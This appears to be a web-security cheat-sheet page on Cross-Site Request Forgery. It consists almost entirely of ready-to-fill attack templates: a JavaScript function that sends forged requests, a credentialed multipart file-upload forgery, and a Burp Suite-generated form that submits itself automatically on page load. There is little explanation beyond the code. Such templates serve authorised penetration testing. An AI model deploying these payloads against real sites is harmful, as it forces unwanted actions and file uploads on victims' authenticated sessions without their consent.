CSRF
Cross-Site Request Forgery (CSRF)

Request

1
function req(method, url, body=null) {
2
request = new XMLHttpRequest();
3
request.open(method, url);
4
if (method.localeCompare("POST") === 0) {
5
request.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
6
}
7
request.send(body);
8
for(; request.readyState !== XMLHttpRequest.DONE;)
9
return request;
10
}
11
12
function trigger_change(needed_value) {
13
req("METHOD", "/ENDPOINT", "DATA (IF POST REQUEST)");
14
}
15
16
trigger_change("VALUE");
Copied!

File Upload

1
var targetLocation= "/ENDPOINT";
2
3
function byteValue(x) {
4
return x.charCodeAt(0) & 0xff;
5
}
6
7
function toBytes(datastr) {
8
var ords = Array.prototype.map.call(datastr, byteValue);
9
var ui8a = new Uint8Array(ords);
10
return ui8a.buffer;
11
}
12
13
if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
14
XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
15
this.send(toBytes(datastr));
16
}
17
}
18
19
function fileUpload(fileData, fileName) {
20
var fileSize = fileData.length,
21
boundary = "--------------------------------1337", // MAX 70 chars.
22
uri = targetLocation,
23
xhr = new XMLHttpRequest();
24
25
var additionalFields = {
26
}
27
28
var fileFieldName = "fieldName";
29
30
xhr.open("POST", uri, true);
31
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*;q=0.8")
32
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary); // simulate a file MIME POST request.
33
xhr.setRequestHeader("Content-Length", fileSize);
34
xhr.withCredentials = "true";
35
36
xhr.onreadystatechange = function() {
37
console.log(xhr.responseText);
38
}
39
40
var body = "";
41
42
for (var i in additionalFields) {
43
if (additionalFields.hasOwnProperty(i)) {
44
body += addField(i, additionalFields[i], boundary);
45
}
46
}
47
48
body += addFileField(fileFieldName, fileData, fileName, boundary);
49
body += "--" + boundary + "--";
50
xhr.sendAsBinary(body);
51
return true;
52
}
53
54
function addField(name, value, boundary) {
55
var c = "--" + boundary + "\r\n"
56
c += "Content-Disposition: form-data; name='" + name + "'\r\n\r\n";
57
c += value + "\r\n";
58
return c;
59
}
60
61
function addFileField(name, value, filename, boundary) {
62
var c = "--" + boundary + "\r\n"
63
c += "Content-Disposition: form-data; name='" + name + "'; filename='" + filename + "'\r\n";
64
c += "Content-Type: application/x-compressed\r\n\r\n";
65
c += value + "\r\n";
66
return c;
67
}
68
69
var start = function() {
70
var c = "HEX-FILE-DATA"
71
fileUpload(c, "FILE-NAME");
72
};
73
74
start();
Copied!

Form Submit

1
<html>
2
<!-- CSRF PoC - generated by Burp Suite Professional -->
3
<body>
4
<script>history.pushState('', '', '/')</script>
5
<form action="http(s)://server" method="POST">
6
<input type="hidden" name="param1" value="1" />
7
<input type="hidden" name="param2" value="2" />
8
<input type="submit" value="Submit Request" />
9
</form>
10
<script>
11
document.forms[0].submit();
12
</script>
13
</body>
14
</html>
Copied!
Last modified 1yr ago